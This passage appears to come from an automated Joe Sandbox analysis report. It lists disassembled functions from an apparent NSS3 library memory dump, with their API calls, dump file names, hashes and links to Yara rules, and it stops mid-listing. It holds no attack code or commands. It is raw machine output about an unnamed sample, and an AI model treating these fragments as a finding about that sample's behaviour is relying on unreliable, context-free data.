PR_GetCurrentThread.NSS3(?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000), ref: 6C7B0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C7B1444,?,00000001,?,00000000,00000000,?), ref: 6C7B0E79

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Part of subcall function 6C78B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C791397,00000000,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1CB
Part of subcall function 6C78B1A0: free.MOZGLUE(5B5F5EC0,?,6C78CF93,5B5F5EC0,00000000,?,6C791397,?), ref: 6C78B1D2

Part of subcall function 6C7889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7888AE,-00000008), ref: 6C788A04
Part of subcall function 6C7889E0: EnterCriticalSection.KERNEL32(?), ref: 6C788A15
Part of subcall function 6C7889E0: memset.VCRUNTIME140(6C7888AE,00000000,00000132), ref: 6C788A27
Part of subcall function 6C7889E0: PR_Unlock.NSS3(?), ref: 6C788A35

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction ID: f5e38a888ec62fabadb548e156a54d515ec67db1fa1c781819866a716f790658
Opcode Fuzzy Hash: f2932aa7cf7e01775f259f4e6fca77d8c7c333ac009c5b749a6762f93fd12958
Instruction Fuzzy Hash: 1251A7F5D012015FEB10AF64EF89AAB37A8AF05258F150474ED09A7B52F731ED1487A2

Function 6C77E6B0 Relevance: 12.2, APIs: 8, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6C9

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6D9

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6F4
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C77E703

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

CERT_FindCertIssuer.NSS3(?,?,6C7804DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C77E71E

Part of subcall function 6C77C870: PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,6C772D1A), ref: 6C77C919

Part of subcall function 6C77E5E0: PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C77E755,00000000,00000004,?,?), ref: 6C77E5F5
Part of subcall function 6C77E5E0: PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C77E62C

CERT_DestroyCertificate.NSS3(?), ref: 6C77E8AF

Part of subcall function 6C77E5E0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C77E63E
Part of subcall function 6C77E5E0: PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C77E65C
Part of subcall function 6C77E5E0: SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C77E68E

SECITEM_CopyItem_Util.NSS3(00000000,-00000030,?), ref: 6C77E89E

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

CERT_DestroyCertificate.NSS3(?), ref: 6C77E885

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Value$CopyCriticalEnterSectionUnlock$Alloc_CertificateDestroyErrorFindMark_$AlgorithmAllocAllocateCertHashIssuerK11_Tag_Zfreememcpymemset
String ID:
API String ID: 27740541-0
Opcode ID: 7e34347ebc6ca3fd6558790341aa80297c3df0e4ca801399c9d530f55bb7a210
Instruction ID: fa6719b8936a752a3d880c72ce9640a734bd581c45d7407407f5daaf33c50b29
Opcode Fuzzy Hash: 7e34347ebc6ca3fd6558790341aa80297c3df0e4ca801399c9d530f55bb7a210
Instruction Fuzzy Hash: C16188B5D0060D9FEF18CF64CD40AFAB7B8EF09308F004269E915AA741FB359A45CBA0

Function 6C766E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C766ED8
sqlite3_value_text.NSS3(?,?), ref: 6C766EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C766FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C766FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C766FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C767010
sqlite3_value_blob.NSS3(?,?), ref: 6C76701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C767052

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction ID: 5f926acc5c0e6bd3f93e9766d2e95eb6a8579d3a5a14180be9fd3aba554bf6bc
Opcode Fuzzy Hash: 423342cbba2911d45c5efebab447c7a6c0fa1cd7ebc8fdb4ca6cbca3c5d766bd
Instruction Fuzzy Hash: AD61E4B1E142058BDB00CFAACA047EEB7B2AF85308F684175DC54ABF51E7319D05CBA0

Function 6C7DC6E0 Relevance: 12.1, APIs: 8, Instructions: 149COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC70F

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC7B1

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC7D5
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC811
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC841
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7DC855
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6C7D71CF,?), ref: 6C7DC868

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_CertificateDestroyFree$ErrorHashLookupTable$ConstCriticalEnterFindSectionUnlockValue
String ID:
API String ID: 1768726504-0
Opcode ID: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction ID: 1c177ea6acdfa320cba86e857bf3074f5fbf09856e6f62c2832a1e55c09a0369
Opcode Fuzzy Hash: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction Fuzzy Hash: 5A418E71B012018BEB10AE66DA84F5677E9AF05769F2B0174ED28DBB51E770F880C790

Function 6C7C2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C7C2D7C,6C799192,?), ref: 6C7C248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C7C24A2
memset.VCRUNTIME140(6C7C2D7C,00000020,6C7C2D5C), ref: 6C7C250E
memset.VCRUNTIME140(6C7C2D9C,00000020,6C7C2D7C), ref: 6C7C2535
memset.VCRUNTIME140(?,00000020,?), ref: 6C7C255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C7C2583
PR_Unlock.NSS3(?), ref: 6C7C2594
PR_SetError.NSS3(00000000,00000000), ref: 6C7C25AF

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 713b9707253fa7482c56325e81a6c8654860ca4b522edd21cc03a17840663c79
Instruction ID: 0e5bdc0a01d762fa878a0bfcd1e3078e7b54ec888642a557b8de6a621aa3bcc3
Opcode Fuzzy Hash: 713b9707253fa7482c56325e81a6c8654860ca4b522edd21cc03a17840663c79
Instruction Fuzzy Hash: 8841C4B1F002025FEB159F34EE587AA3774BB59308F142A79DC05D7A52F770EA84C692

Function 6C7C05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C7C05DA

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

TlsGetValue.KERNEL32(00000000), ref: 6C7C060C
EnterCriticalSection.KERNEL32 ref: 6C7C0629
TlsGetValue.KERNEL32(00000000), ref: 6C7C066F
EnterCriticalSection.KERNEL32 ref: 6C7C068C
PR_Unlock.NSS3 ref: 6C7C06AA
PK11_GetNextSafe.NSS3 ref: 6C7C06C3
PR_Unlock.NSS3 ref: 6C7C06F9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 804877a19990b42a300fbdbb880a5f88862d502b1f6904f5246630dbcf1ad790
Instruction ID: 9482854c4fc3ec676894fa811a82bbc37416e4395e59e37f9fc4163948840ba6
Opcode Fuzzy Hash: 804877a19990b42a300fbdbb880a5f88862d502b1f6904f5246630dbcf1ad790
Instruction Fuzzy Hash: 5A511BB4A057468FDB10DF79C68466ABBF0BF45318F118939D8999BB01EB30E494CBD2

Function 6C88A6F0 Relevance: 12.1, APIs: 8, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

EnterCriticalSection.KERNEL32(?), ref: 6C88A712
_PR_MD_UNLOCK.NSS3(?), ref: 6C88A76D

Part of subcall function 6C8370F0: LeaveCriticalSection.KERNEL32(6C880C7B), ref: 6C83710D

calloc.MOZGLUE(00000001,0000000C), ref: 6C88A779
_PR_CreateThread.NSS3(00000000,6C889EA0,?,00000001,00000001,00000000,?,00000000), ref: 6C88A79B
free.MOZGLUE(00000000), ref: 6C88A7AB
EnterCriticalSection.KERNEL32(?), ref: 6C88A7C5
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C88A7FC
_PR_MD_UNLOCK.NSS3(?), ref: 6C88A824

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Enter$CreateLeaveThreadValuecallocfree
String ID:
API String ID: 3459369588-0
Opcode ID: 7d556381f85c1509ad880a8ebbf0d9ae8ddbc3e735c7b51602648bf75f065639
Instruction ID: 9b55bdfe099a2746d4b79a9c0b36c6f8cc26de1c2b05847d4eb13791a608d122
Opcode Fuzzy Hash: 7d556381f85c1509ad880a8ebbf0d9ae8ddbc3e735c7b51602648bf75f065639
Instruction Fuzzy Hash: 31418CB19006119FC720DF69C9849ABB7F8FF45308B148A39D85AC7F51EB31E955CBA0

Function 6C7B66B0 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000010,00000000), ref: 6C7B66D0
realloc.MOZGLUE(?,?,?,?,?,00000010,00000000), ref: 6C7B66FB

Part of subcall function 6C7D4540: PORT_ZAlloc_Util.NSS3(00000001,?,-00000001,-00000001,?,6C7B6725,?,00000022,?,?,?,?,?,00000010,00000000), ref: 6C7D4581

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C7B673A
memcpy.VCRUNTIME140(00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C7B6757
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C7B676E
memcpy.VCRUNTIME140(6C7AC79F,?,?,?,?,?,00000010,00000000), ref: 6C7B6781
memcpy.VCRUNTIME140(00000001,?,-00000001,?,?,?,?,?,?,00000010,00000000), ref: 6C7B679D
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,00000010,00000000), ref: 6C7B67BC

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$Alloc_ErrorUtilfreereallocstrlen
String ID:
API String ID: 922128022-0
Opcode ID: 663d4c1d27411ed090edaf8f2e43f0ca3c67a1f2d67eb0a212b0396e2094145c
Instruction ID: 80a06db3a4d12ecafc3f5b9966a336876b6eff7e7d2726f7eba5ba5b6333772a
Opcode Fuzzy Hash: 663d4c1d27411ed090edaf8f2e43f0ca3c67a1f2d67eb0a212b0396e2094145c
Instruction Fuzzy Hash: C531EA76900209AFDF21DFA8DD459AF77B8EF55314F140438E914AB740E732AA19C7E1

Function 6C7D25E0 Relevance: 12.1, APIs: 8, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C7D2610
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000), ref: 6C7D261F

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C7D263B
_wopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,0000010A,00000000,?,000000FF,00000000,00000000), ref: 6C7D264A
free.MOZGLUE(00000000,?,?,00000000), ref: 6C7D2656
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C8BDEB8), ref: 6C7D2676
_close.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 6C7D2684
free.MOZGLUE(00000000,?,000000FF,00000000,00000000), ref: 6C7D268D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_close_fdopen_wopenmalloc
String ID:
API String ID: 3511306438-0
Opcode ID: eaca0cc8a22ce2c36abebe9d742131e1a3668d3dec3089d7da30b790787d0de3
Instruction ID: 20f289490527da4b58a453fcf65d197ef0981c6d517b85819127978804ef209d
Opcode Fuzzy Hash: eaca0cc8a22ce2c36abebe9d742131e1a3668d3dec3089d7da30b790787d0de3
Instruction Fuzzy Hash: B71104B07003027BFB1427369D4EA3B39ACEB41269F150539FD09C5A82EE64ED11C2E2

Function 6C81A7D0 Relevance: 12.1, APIs: 8, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000002C,00000000,6C802AE9,?,6C81A98D,?,?,?,?), ref: 6C81A7D7

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

SECITEM_CopyItem_Util.NSS3(00000000,-00000014,?,0000065C), ref: 6C81A80B

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PK11_FreeSymKey.NSS3(?,?,?,?,?,?,0000065C), ref: 6C81A82E

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(?,?,?,?,?,?,0000065C), ref: 6C81A845
SECITEM_ZfreeItem_Util.NSS3(-00000014,00000000,?,?,?,?,?,0000065C), ref: 6C81A857
free.MOZGLUE(00000000,?,?,?,?,?,?,?,0000065C), ref: 6C81A860
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,0000065C), ref: 6C81A81E

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE013,00000000,0000065C), ref: 6C81A872

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: UtilValue$Alloc_CriticalEnterErrorFreeItem_K11_Sectionfree$ArenaCopyUnlockZfreecallocmemcpymemset
String ID:
API String ID: 1855126447-0
Opcode ID: 02870796bdbba1179d38f9993752c7220d3fec07666f981ad529ca26f408f6e0
Instruction ID: 1eaa7fd78ec97dded8ce4fe4fa2f3eba8a990b33b25d834aa3019c9308d2ecb1
Opcode Fuzzy Hash: 02870796bdbba1179d38f9993752c7220d3fec07666f981ad529ca26f408f6e0
Instruction Fuzzy Hash: 9211C4B5A0431257E6209F6AED09F9777D89F4065CF104838EC1A97F41E735E50A86A2

Function 6C7665D0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C76670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C762B2C), ref: 6C76675E
EnterCriticalSection.KERNEL32(?), ref: 6C76678E
